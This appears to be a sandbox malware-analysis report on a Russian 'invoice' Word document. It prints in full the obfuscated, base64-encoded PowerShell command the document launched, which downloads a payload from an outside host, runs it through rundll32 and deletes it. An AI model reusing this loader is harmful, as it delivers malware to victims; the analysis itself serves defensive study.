sACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3240"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -win hidden -noni -e IwAjACMAeABsAGUAdAB0AHIAbABwAHcAaQBiAHMACgAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACAAPQAgACIAcgB0AHMAdQB6AGwAbABmAGIAagBkAGoAbAAiADsACgAkAGkAbwBzAHQAYgBvAGgAegBsAHMAawA9ACIAeQBmAGEAZgBhACIAOwAKACQAZwBrAGkAYQB2AHAAdQBrAD0ANwA7AEYAbwByACAAKAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByAD0AMAA7ACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgAgAC0AbABlACAAMgAxADsAIAAkAGoAYQBmAGsAYwBnAHoAZABhAGIAZgB5AGIAeQByAGgAbAB5AHoAbQByACsAKwApACAAewAkAGcAawBpAGEAdgBwAHUAawA9ACAAKAA5ADIAIAAqACAAJABqAGEAZgBrAGMAZwB6AGQAYQBiAGYAeQBiAHkAcgBoAGwAeQB6AG0AcgApAH0ACgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAIgBcACIAKwAkAG0AZwB6AGkAZQB6AGQAcwBuAHMAagB6ACsAIgAuAGIAaQBuACIAOwAKACQAYQBxAGYAdwB0AGkAcABmAGEAdQA9ACIAagBoAHUAeABtAHQAcQB0AGoAcABqAHIAZABiACIAOwAKACQAdQB1AG0AaAB1AGIAZABrAGoAPQAiAGgAdAB0AHAAOgAvAC8AdABvADQAawBhAHIAdQAuAHIAdQAvAGwAaQBlAHIAaABnAGkAbwBqAHMAZwBpAG8AdQB2AGIAagBuAGsAZgBlAGkAdQBiAGcALgBiAGkAbgAiADsACgAkAGkAbgBwAGsAZgBuAGgAbAB5AHQAdAA9ACIAbQB1AHkAdABpAGQAYwBnAGgAdgB5AGcAZwBiAHkAYgByACIAOwAKACQAcwBiAHgAaABxAGcAZgBqAGYAegBxAHkAbQB6ACAAPQAgACQAYwBrAGQAbgBqAHQAYwBuAG0AZgBwAGIAbgA7AAoAJAB6AHMAegBuAGcAaQBlAGsAeQBzAHkAYgA9ACIAegBtAHMAdQBtAGMAZABtAGIAegB6AHQAZwBxAHYAZgB1ACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGcAbQBjAGgAawBrAGcAaQBuAHEAawBtAHoAcABvAHgAcQBvAHEAcQB7AAoAJABhAG4AZgByAGgAdwBoAD0AIgBzAHEAYgBmAHgAdQBsAHkAYgBoACIAOwAKACQAagBsAHoAeABiAHUAbAB5AGQAagBtAG8APQAiAGgAcwB1AHIAIgA7AAoAJABzAHYAagB6AHIAawB6AHQAPQAiAHYAYgBkAG0AegBxAGkAbQBwAHYAeQByAG4AegBxAHcAIgA7AAoAJABvAGUAaABkAHIAbwBrAHYAbABzAGkAdgA9ACIAbwBhAGoAcABzAHEAawAiADsACgAkAHEAbABtAGMAeAByAGMAegBvAHUAPQAiAHQAZgBhAHkAZQBoAHcAbAB5AHAAIgA7AAoAJAB6AGwAZgBuAHMAZQA9ACIAeABiAGoAegBlACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAHcAbgBsAGQAewAKACQAZQB0AHMAYgBzAGYAbAB4AG0APQAiAHYAdABjAHMAcwB6AHQAbQByAG8AbAB0AGIAIgA7AAoAVwBoAGkAbABlACAAKAAkAHMAYgB4AGgAcQBnAGYAagBmAHoAcQB5AG0AegAgAC0AZQBxACAAJABjAGsAZABuAGoAdABjAG4AbQBmAHAAYgBuACkAIAB7AAoAJAByAHgAbQBzAHoAawB6AG8AcQBrAHYAbwBuAGUAPQAiAGoAbQBqAGIAbABxACIAOwAKAHQAcgB5AHsACgAkAGMAcgB6AHQAagB4AGoAcQB2AGIAbwB5AGwAcAA9ACIAegBzAHgAagBkAGcAeABuAGwAZABnAGgAeQB5AGsAegAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMAPQAmACgAIgBuAGUAdwAtAG8AYgBqAGUAYwB0ACIAKQAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAeABwAGYAegBjAHkAPQAiAHkAZABoAG0AbQBrAGkAZAB0AHAAYgB3AGoAYwBmAHkAeAAiADsACgAkAGQAaQBwAGQAaQB6AHMAbAB6AGMALgAiAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACIAKAAkAHUAdQBtAGgAdQBiAGQAawBqACwAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQA7AAoAJABlAHIAdABjAGgAYQA9ACIAaABlAGwAdwB4AHoAIgA7AAoASQBmACAAKAAoAC4AKAAiAEcAZQB0AC0ASQB0AGUAbQAiACkAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAKQAuACIAbABlAG4AZwB0AGgAIgAgAC0AZwBlACAAMQAwADIAMQAwADcAKQAgAHsACgAkAHYAaABtAGQAcABzAGgAcgBhAHEAYQB3AGMAbgA9ACIAaQBjAGQAagB4AGcAIgA7AAoAJABzAGIAeABoAHEAZwBmAGoAZgB6AHEAeQBtAHoAIAA9ACAAJABvAGgAegBkAHIAcgBvAHMAaQBsAGUAbgB4AGQAOwAKACQAZgBjAHcAbgBuAHAAcwA9ACIAYQBhAHIAZwBlAGwAcgBvAGMAYgBrAGEAdAB2AG8AIgA7AAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAIgByAHUAbgBkAGwAbAAzADIALgBlAHgAZQAiACAALQBBAHIAZwBzACAAIgAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoALAAgAEQAbABsAFIAZQBnAGkAcwB0AGUAcgBTAGUAcgB2AGUAcgAiADsACgAkAHEAawBnAHMAdQBqAHoAawBqAGkAPQAiAG0AegBjAGwAcwBrAG0AeABkAG4AdgBuAGEAcQB4AGsAIgA7AAoAZABlAGwAZgA7AAoAJAB5AGQAYgBoAGgAdwBrAGIAdAB4AGwAeABvAG8APQAiAHoAcQBlAGMAegBrAHQAIgA7AAoAZQB4AGkAdAA7AAoAJABlAGkAaQBlAHIAYwA9ACIAeQBvAGsAYwBnAHMAcABiAHEAbABiAGQAcABwAGEAZgAiADsACgB9AAoAJAByAG4AawBsAHIAaQBtAHYAZwBlAD0AIgByAHgAawB0AHMAZQBvAG4AdQB2ACIAOwAKAH0AYwBhAHQAYwBoAHsACgAkAGEAYgBuAGUAegByAG8AcQBrAGgAegB3AHQAdQA9ACIAagBzAGoAbgBpAHAAcgAiADsACgB9AAoAJAB5AHAAZgBtAGoAaABoAGEAaABoAD0AIgBjAHoAeQBmAHYAIgA7AAoAcwBsAGUAZQBwACAALQBzACAANQA7AAoAJABoAHgAbgBvAGIAPQAiAHcAZABoAGYAIgA7AAoAfQB9AGYAdQBuAGMAdABpAG8AbgAgAHQAdwBmAGoAYQB7AAoAJABwAHAAcQB4AGUAPQAiAGEAcAB3AGsAYQBoACIAOwAKACQAbgBoAGQAbgB6AHoAYwB5AGkAYgA9ACIAdABnAHcAZgBmACIAOwAKACQAdQB5AGUAdABjAGEAdABuAGUAagB1AG4APQAiAG4AcQBhAHMAZABjAHcAbgAiADsACgAkAGgAaAB1AGcAZwBuAHIAdwBqAGMAPQAiAHIAdQB6AHMAIgA7AAoAJABxAHcAeQB2AHYAdwBvAGoAPQAiAGQAZQBrAGkAIgA7AAoAJAB2AGwAcQBlAGEAPQAiAHkAcABiAGgAeQBmAHMAdwB3AHcAIgA7AAoAJAB5AGIAagB4AHoAdQBvAGkAeQB5AHEAagBmAHEAbAA9ACIAYgBuAGQAegBsAHIAYgB5AGIAZwB0AGgAYwBiACIAOwAKAH0ACgBGAHUAbgBjAHQAaQBvAG4AIABkAGUAbABmAHsACgAkAHkAdgBvAHcAaQB3AGEAPQAiAGIAZQB4AHoAIgA7AAoAdAByAHkAewAKACQAZABpAHoAcABtAGEAdQBwAG4AcgBpAG8AeQBnAHkAPQAiAHIAZABsAGwAbgBsAGwAcAB5AGMAaQBtAGgAYQB5AHMAbgAiADsACgBzAGwAZQBlAHAAIAAtAHMAIAAxADAAOwAKACQAdgB6AGIAaQBnAGgAbwBuAGUAegByAGgAZwBiAD0AIgB5AGoAdQBrAHYAeQB0AGoAYwB3AHMAaQBsAHYAbwBkAG0AawAiADsACgBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAAtAFAAYQB0AGgAIAAkAHgAdABuAGsAeQB4AHkAcABlAGEAegBzAGoAOwAKACQAbwBhAGoAdgBnAG4AdQBqAHYAZgBsAGQAPQAiAHEAdQBkAGQAdQBnAGgAcgAiADsACgB9AGMAYQB0AGMAaAB7AAoAJABwAHAAegBiAHYAcwBrAGIAbAA9ACIAZwB2AHYAaAAiADsACgBkAGUAbABmADsACgAkAHQAZwB1AGIAcQBwAG8AaQA9ACIAZQB5AGQAeABlAGEAcwB1AHYAegBnACIAOwAKAH0AfQBkAHcAbgBsAGQAOwAKACQAZABtAGUAawBnAG4APQAiAHIAdABuAGIAeQBnAGUAegBiAGwAYQBhAGYAYwBoAHoAZAAiADsACgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
3 646
Read events
2 409
Write events
1 099
Delete events
138

Modification events

(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:u`5
Value:
75603500A40F0000010000000000000000000000
(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(4004) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
Executable files
0
Suspicious files
10
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
4004WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE075.tmp.cvr
MD5:
SHA256:
4004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B85110B.wmf
MD5:
SHA256:
4004WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14799A51.wmf
MD5:
SHA256:
2792powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YXVUFUH03MR62MFWW69U.temp
MD5:
SHA256:
3972powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IJ12EM65J5F8VIJWOBUW.temp
MD5:
SHA256:
1252powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G17ANFX80F87ALDM7WPA.temp
MD5:
SHA256:
3836powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N5WEAZE2I1C82AO2GURF.temp
MD5:
SHA256:
2444powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\54XSJ9AIGN7OCTH1EKXU.temp
MD5:
SHA256:
3924powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6KNBW52O6K2Z1VFC52T9.temp
MD5:
SHA256:
2932powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3QEO1B8JS8UGALLV4BCZ.temp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

Domain
IP
Reputation
to4karu.ru
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Фактура_28_04_2020.doc